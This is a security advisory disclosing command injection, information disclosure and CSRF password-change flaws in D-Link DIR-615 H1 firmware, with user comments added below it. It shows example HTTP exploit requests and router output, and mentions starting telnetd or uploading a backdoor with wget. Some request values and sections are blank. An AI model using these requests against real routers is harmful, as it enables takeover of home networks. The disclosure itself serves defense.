no one is safe ...

Multiple Vulnerabilities in D'Link DIR-615

Device Name: DIR-615 - Hardware revision H1
Vendor: D-Link

============ Device Description: ============

Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.


============ Vulnerable Firmware Releases: ============

Firmware Version : 8.04, Tue, 4, Sep, 2012
Firmware Version : 8.04, Fri, 18, Jan, 2013

============ Vulnerability Overview: ============

  • OS-Command Injection:

=> Parameter: ping_ipaddr

The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:



GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate


HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==
var vctinfo= [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},

You have wget on the device for downloading further tools.

  • Information Disclosure:

Detailed device information with configuration details.




  • For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /tools_admin.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 77


  • CSRF for changing the password without knowing the current one:

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Advisory URL:
Twitter: @s3cur1ty_de

============ Time Line: ============

November 2012 - discovered vulnerability
11.11.2012 - contacted dlink via the webinterface
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
07.02.2013 - no update from dlink, public release
===================== Advisory end =====================


So there's no possibility to enter when logged out?

I had a DIR-300 which has the vulnerability that the admin password can be changed by a HTTP POST without knowing the old password AND without the need of a "logged in browser".

In contrast to that, as far as I understand, the DIR-615 cannot be penetrated like this, right?

I usually configure my router once and then leave it as it is. I'm never logged in with my browser otherwise. So I can consider it safe, right?

Or what didn't I understand?

my english is bad

What is "safe" for you ?

I have dir-615 hardware type H1, and I can't wrote "I feel safe and secure" - D-link f**k up security in their firmware and blame users browser as cause. Also this router on their site have "product live" status ...

Probably this is my first, and last hardware that i bought from D-Link.

s3cur1ty thanks for reporting this to community.

New Software Release Firmware 4.14b02

Dlink released a new firmware 17.04.2013

Is this firmware still vulnerable?